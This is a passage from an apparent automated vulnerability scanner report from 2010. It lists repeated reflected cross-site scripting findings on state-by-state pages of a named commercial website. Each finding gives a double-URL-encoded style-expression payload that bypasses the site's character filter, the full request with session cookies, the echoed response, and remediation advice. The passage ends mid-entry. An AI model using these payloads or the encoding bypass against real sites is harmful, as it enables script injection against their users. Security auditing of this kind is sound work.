Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Edmonton

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:44 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:43 GMT
NS_RTIMER_COMPOSITE: 1114188816:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=944
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87520


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Edmonton</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=260131&dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1&dbb0f%27style%3d%27x%3aexpression%28alert%281%29%29%27eba22f9b445=1&dbb0f'style='x:expression(alert(1))'eba22f9b445=1&fromsla=T'>
...[SNIP]...

2.194. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Florida

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:53 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: -1699143552:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111479


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Florida</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175362&6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1&6608e'style='x:expression(alert(1))'462ed1390c5=1&6608e%27style%3d%27x%3aexpression%28alert%281%29%29%27462ed1390c5=1&fromsla=T'>
...[SNIP]...

2.195. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Georgia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: -811335755:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=972
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110892


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Georgia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175363&cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1&cd6fd'style='x:expression(alert(1))'66d636fc045=1&cd6fd%27style%3d%27x%3aexpression%28alert%281%29%29%2766d636fc045=1&fromsla=T'>
...[SNIP]...

2.196. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Hawaii

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:13 GMT
NS_RTIMER_COMPOSITE: 334650841:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98513


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hawaii</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=259733&8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1&8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5=1&8d2a5%27style%3d%27x%3aexpression%28alert%281%29%29%278b5f9f5f3a5=1&fromsla=T'>
...[SNIP]...

2.197. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Idaho

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:07 GMT
NS_RTIMER_COMPOSITE: -1255238677:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 92858


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Idaho</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175364&1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1&1b675'style='x:expression(alert(1))'73c56e3d4b3=1&1b675%27style%3d%27x%3aexpression%28alert%281%29%29%2773c56e3d4b3=1&fromsla=T'>
...[SNIP]...

2.198. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Illinois

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:21 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:20 GMT
NS_RTIMER_COMPOSITE: 778553075:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=845
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111147


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Illinois</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175365&a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1&a8939%27style%3d%27x%3aexpression%28alert%281%29%29%27a322cf42a27=1&fromsla=T&a8939'style='x:expression(alert(1))'a322cf42a27=1'>
...[SNIP]...

2.199. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Indiana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:15 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:13 GMT
NS_RTIMER_COMPOSITE: 2001998493:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110889


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Indiana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175366&ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1&ddb83%27style%3d%27x%3aexpression%28alert%281%29%29%2731d9a9bbd80=1&ddb83'style='x:expression(alert(1))'31d9a9bbd80=1&fromsla=T'>
...[SNIP]...

2.200. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Iowa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:13 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:09 GMT
NS_RTIMER_COMPOSITE: -1590883224:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=973
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110110


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Iowa</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175368&7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1&7a3d8%27style%3d%27x%3aexpression%28alert%281%29%29%2757114ddf99c=1&7a3d8'style='x:expression(alert(1))'57114ddf99c=1&fromsla=T'>
...[SNIP]...

2.201. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Kansas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:06 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:04 GMT
NS_RTIMER_COMPOSITE: -1255239272:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=765
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54497


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kansas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175369&b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1&b1e4f'style='x:expression(alert(1))'77e22b95d60=1&fromsla=T&b1e4f%27style%3d%27x%3aexpression%28alert%281%29%29%2777e22b95d60=1'>
...[SNIP]...

2.202. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Kentucky

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:18 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:18 GMT
NS_RTIMER_COMPOSITE: 1558098663:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=989
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110267


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kentucky</title>


